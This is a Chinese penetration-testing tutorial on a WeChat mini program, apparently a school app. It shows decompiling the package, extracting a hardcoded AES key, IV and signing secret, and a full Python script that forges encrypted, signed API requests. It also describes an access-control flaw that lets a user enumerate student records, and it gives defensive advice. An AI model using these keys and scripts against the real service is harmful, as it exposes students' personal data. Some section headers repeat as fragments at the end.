微信小程序逆向分析与安全测试实战教程<\/h1>

一、前言<\/h2>
本教程详细记录了一次微信小程序逆向分析与安全测试的全过程，涵盖反编译、加密分析、签名破解、重放攻击等技术要点。通过本案例，读者可以学习到微信小程序安全测试的完整方法论。<\/p>

二、工具准备<\/h2>

反编译工具<\/strong>：<\/p>

wxapkg解密工具：https:\/\/github.com\/wux1an\/wxapkg<\/li>
用于解包微信小程序的.wxapkg文件<\/li> <\/ul> <\/li>

加密分析工具<\/strong>：<\/p>

在线AES工具：https:\/\/www.wushuangzl.com\/tools\/aes\/<\/li>
用于验证加密算法<\/li> <\/ul> <\/li>

抓包工具<\/strong>：<\/p>

Burp Suite + autoDecoder插件<\/li>
用于拦截和自动加解密流量<\/li> <\/ul> <\/li>

开发环境<\/strong>：<\/p>

Python 3.x<\/li>
PyCryptodome库（AES加解密）<\/li>
hashlib库（MD5计算）<\/li> <\/ul> <\/li> <\/ol>
三、反编译小程序<\/h2>

获取小程序.wxapkg文件：<\/p>

从微信缓存目录中提取目标小程序的包文件<\/li> <\/ul> <\/li>

使用wxapkg工具反编译：<\/p>
wxapkg -d input.wxapkg output_dir <\/span><\/span><\/code><\/pre> 反编译后得到JS源码，便于后续分析<\/li> <\/ul> <\/li> <\/ol> 四、加密分析<\/h2> 1. 识别加密方式<\/h3> 通过抓包和源码分析，确认小程序使用：<\/p> AES-CBC<\/strong>模式加密<\/li> 固定密钥：Wet2C8d34f62ndi3<\/code><\/li> 固定IV：K6iv85jBD8jgf32D<\/code><\/li> <\/ul> 2. 加解密实现<\/h3> Python实现AES加解密：<\/p> from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad, unpad <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>def<\/span> aes_encrypt<\/span>(data, key, iv): <\/span><\/span> key_bytes =<\/span> key.<\/span>encode('utf-8'<\/span>) <\/span><\/span> iv_bytes =<\/span> iv.<\/span>encode('utf-8'<\/span>) <\/span><\/span> cipher =<\/span> AES.<\/span>new(key_bytes, AES.<\/span>MODE_CBC, iv_bytes) <\/span><\/span> ct_bytes =<\/span> cipher.<\/span>encrypt(pad(data.<\/span>encode('utf-8'<\/span>), AES.<\/span>block_size)) <\/span><\/span> return<\/span> base64.<\/span>b64encode(ct_bytes).<\/span>decode('utf-8'<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> aes_decrypt<\/span>(encrypted_data, key, iv): <\/span><\/span> key_bytes =<\/span> key.<\/span>encode('utf-8'<\/span>) <\/span><\/span> iv_bytes =<\/span> iv.<\/span>encode('utf-8'<\/span>) <\/span><\/span> cipher =<\/span> AES.<\/span>new(key_bytes, AES.<\/span>MODE_CBC, iv_bytes) <\/span><\/span> pt_bytes =<\/span> cipher.<\/span>decrypt(base64.<\/span>b64decode(encrypted_data)) <\/span><\/span> return<\/span> unpad(pt_bytes, AES.<\/span>block_size).<\/span>decode('utf-8'<\/span>) <\/span><\/span><\/code><\/pre>五、签名机制分析<\/h2> 1. Sign签名生成规则<\/h3> 通过分析JS源码，发现签名生成流程：<\/p> 对所有参数按键名排序<\/li> 拼接键名和键值（如key1value1key2value2...<\/code>）<\/li> 末尾添加固定密钥rDJiNB9j7vD2<\/code><\/li> 计算MD5哈希值<\/li> <\/ol> Python实现：<\/p> import<\/span> hashlib <\/span><\/span> <\/span><\/span>def<\/span> generate_sign<\/span>(data, secret_key): <\/span><\/span> sorted_data =<\/span> sorted(data.<\/span>items()) <\/span><\/span> joined_data =<\/span> ''<\/span>.<\/span>join([f<\/span>'<\/span>{<\/span>key}{<\/span>value}<\/span>'<\/span> for<\/span> key, value in<\/span> sorted_data]) <\/span><\/span> joined_data_with_key =<\/span> joined_data +<\/span> secret_key <\/span><\/span> return<\/span> hashlib.<\/span>md5(joined_data_with_key.<\/span>encode()).<\/span>hexdigest() <\/span><\/span><\/code><\/pre>2. 时间戳与随机数<\/h3> timestamp<\/code>：当前UNIX时间戳<\/li> nonce<\/code>：由时间戳后3位+3位随机数组成如果时间戳后3位以0开头，则去掉前导0<\/li> <\/ul> <\/li> <\/ul> Python实现：<\/p> import<\/span> time <\/span><\/span>import<\/span> random <\/span><\/span> <\/span><\/span>def<\/span> generate_nonce<\/span>(): <\/span><\/span> timestamp =<\/span> int(time.<\/span>time()) <\/span><\/span> last_three =<\/span> str(timestamp)[-<\/span>3<\/span>:] <\/span><\/span> if<\/span> last_three[0<\/span>] ==<\/span> '0'<\/span>: <\/span><\/span> last_three =<\/span> last_three[1<\/span>:] <\/span><\/span> random_part =<\/span> ''<\/span>.<\/span>join(str(random.<\/span>randint(0<\/span>,9<\/span>)) for<\/span> _ in<\/span> range(6<\/span>-<\/span>len(last_three))) <\/span><\/span> return<\/span> int(last_three +<\/span> random_part) <\/span><\/span><\/code><\/pre>六、Burp Suite自动化配置<\/h2> 安装autoDecoder插件<\/li> 配置请求\/响应加解密规则：请求解密正则：匹配加密请求体<\/li> 响应解密正则：匹配加密响应体<\/li> <\/ul> <\/li> 配置加解密函数（使用上述Python实现）<\/li> <\/ol> 七、接口安全测试<\/h2> 1. 越权测试<\/h3> 测试uid<\/code>参数是否可篡改<\/li> 发现uid<\/code>与token<\/code>绑定，无法直接越权<\/li> <\/ul> 2. 敏感接口发现<\/h3> 通过分析JS源码发现多个潜在敏感接口：<\/p> \/v3\/api.php\/TeacherCourse\/getStudentList<\/code><\/li> \/v3\/api.php\/Exam\/classStudentList<\/code><\/li> <\/ul> 3. 数据泄露漏洞<\/h3> 普通用户身份可访问教师权限接口<\/li> 通过修改course_id<\/code>参数可遍历获取学生信息<\/li> 泄露数据包含：学号、姓名、学院、专业等<\/li> <\/ul> 八、防御建议<\/h2> 加密增强<\/strong>：<\/p> 避免使用固定密钥和IV<\/li> 考虑使用动态密钥或非对称加密<\/li> <\/ul> <\/li> 签名机制改进<\/strong>：<\/p> 增加签名时效性验证<\/li> 使用更复杂的签名算法（如HMAC-SHA256）<\/li> <\/ul> <\/li> 接口安全<\/strong>：<\/p> 严格权限控制<\/li> 敏感接口增加二次验证<\/li> 对批量查询接口实施速率限制<\/li> <\/ul> <\/li> 混淆加固<\/strong>：<\/p> 对关键JS代码进行混淆<\/li> 使用小程序加固方案<\/li> <\/ul> <\/li> <\/ol> 九、完整测试脚本<\/h2> import<\/span> hashlib <\/span><\/span>import<\/span> time <\/span><\/span>import<\/span> random <\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad, unpad <\/span><\/span>import<\/span> base64 <\/span><\/span>import<\/span> json <\/span><\/span> <\/span><\/span># AES配置<\/span> <\/span><\/span>AES_KEY =<\/span> "Wet2C8d34f62ndi3"<\/span> <\/span><\/span>AES_IV =<\/span> "K6iv85jBD8jgf32D"<\/span> <\/span><\/span> <\/span><\/span># 签名密钥<\/span> <\/span><\/span>SIGN_KEY =<\/span> "rDJiNB9j7vD2"<\/span> <\/span><\/span> <\/span><\/span>def<\/span> aes_encrypt<\/span>(data, key=<\/span>AES_KEY, iv=<\/span>AES_IV): <\/span><\/span> key_bytes =<\/span> key.<\/span>encode('utf-8'<\/span>) <\/span><\/span> iv_bytes =<\/span> iv.<\/span>encode('utf-8'<\/span>) <\/span><\/span> cipher =<\/span> AES.<\/span>new(key_bytes, AES.<\/span>MODE_CBC, iv_bytes) <\/span><\/span> ct_bytes =<\/span> cipher.<\/span>encrypt(pad(data.<\/span>encode('utf-8'<\/span>), AES.<\/span>block_size)) <\/span><\/span> return<\/span> base64.<\/span>b64encode(ct_bytes).<\/span>decode('utf-8'<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> aes_decrypt<\/span>(encrypted_data, key=<\/span>AES_KEY, iv=<\/span>AES_IV): <\/span><\/span> key_bytes =<\/span> key.<\/span>encode('utf-8'<\/span>) <\/span><\/span> iv_bytes =<\/span> iv.<\/span>encode('utf-8'<\/span>) <\/span><\/span> cipher =<\/span> AES.<\/span>new(key_bytes, AES.<\/span>MODE_CBC, iv_bytes) <\/span><\/span> pt_bytes =<\/span> cipher.<\/span>decrypt(base64.<\/span>b64decode(encrypted_data)) <\/span><\/span> return<\/span> unpad(pt_bytes, AES.<\/span>block_size).<\/span>decode('utf-8'<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> generate_sign<\/span>(data, secret_key=<\/span>SIGN_KEY): <\/span><\/span> sorted_data =<\/span> sorted(data.<\/span>items()) <\/span><\/span> joined_data =<\/span> ''<\/span>.<\/span>join([f<\/span>'<\/span>{<\/span>key}{<\/span>value}<\/span>'<\/span> for<\/span> key, value in<\/span> sorted_data]) <\/span><\/span> joined_data_with_key =<\/span> joined_data +<\/span> secret_key <\/span><\/span> return<\/span> hashlib.<\/span>md5(joined_data_with_key.<\/span>encode()).<\/span>hexdigest() <\/span><\/span> <\/span><\/span>def<\/span> generate_nonce<\/span>(): <\/span><\/span> timestamp =<\/span> int(time.<\/span>time()) <\/span><\/span> last_three =<\/span> str(timestamp)[-<\/span>3<\/span>:] <\/span><\/span> if<\/span> last_three[0<\/span>] ==<\/span> '0'<\/span>: <\/span><\/span> last_three =<\/span> last_three[1<\/span>:] <\/span><\/span> random_part =<\/span> ''<\/span>.<\/span>join(str(random.<\/span>randint(0<\/span>,9<\/span>)) for<\/span> _ in<\/span> range(6<\/span>-<\/span>len(last_three))) <\/span><\/span> return<\/span> int(last_three +<\/span> random_part) <\/span><\/span> <\/span><\/span>def<\/span> build_request_payload<\/span>(base_data): <\/span><\/span> timestamp =<\/span> int(time.<\/span>time()) <\/span><\/span> nonce =<\/span> generate_nonce() <\/span><\/span> data =<\/span> { <\/span><\/span> **<\/span>base_data, <\/span><\/span> "timestamp"<\/span>: timestamp, <\/span><\/span> "nonce"<\/span>: nonce <\/span><\/span> } <\/span><\/span> data["sign"<\/span>] =<\/span> generate_sign(data) <\/span><\/span> return<\/span> aes_encrypt(json.<\/span>dumps(data)) <\/span><\/span> <\/span><\/span># 示例使用<\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> base_data =<\/span> { <\/span><\/span> "uid"<\/span>: 100123<\/span>, <\/span><\/span> "token"<\/span>: "216A3906F97C26A29EC0FE10F3956692"<\/span>, <\/span><\/span> "school_id"<\/span>: 464<\/span>, <\/span><\/span> "course_id"<\/span>: 0<\/span>, <\/span><\/span> "student_num"<\/span>: "123"<\/span> <\/span><\/span> } <\/span><\/span> <\/span><\/span> encrypted =<\/span> build_request_payload(base_data) <\/span><\/span> print("Encrypted:"<\/span>, encrypted) <\/span><\/span> <\/span><\/span> # 解密测试<\/span> <\/span><\/span> decrypted =<\/span> aes_decrypt(encrypted) <\/span><\/span> print("Decrypted:"<\/span>, decrypted) <\/span><\/span><\/code><\/pre>十、总结<\/h2> 本案例展示了微信小程序安全测试的完整流程，从反编译到加密分析，再到接口安全测试。关键点包括：<\/p> 小程序包反编译技术<\/li> AES加密算法的识别与破解<\/li> 签名机制的逆向分析<\/li> Burp Suite自动化测试配置<\/li> 接口权限绕过测试方法<\/li> <\/ol> 通过这种系统化的分析方法，可以有效发现小程序中存在的各类安全问题。<\/p>

微信小程序逆向分析与安全测试实战教程<\/h1>

一、前言<\/h2> 本教程详细记录了一次微信小程序逆向分析与安全测试的全过程，涵盖反编译、加密分析、签名破解、重放攻击等技术要点。通过本案例，读者可以学习到微信小程序安全测试的完整方法论。<\/p>

四、加密分析<\/h2>

五、签名机制分析<\/h2>

七、接口安全测试<\/h2>

一、前言<\/h2>
本教程详细记录了一次微信小程序逆向分析与安全测试的全过程，涵盖反编译、加密分析、签名破解、重放攻击等技术要点。通过本案例，读者可以学习到微信小程序安全测试的完整方法论。<\/p>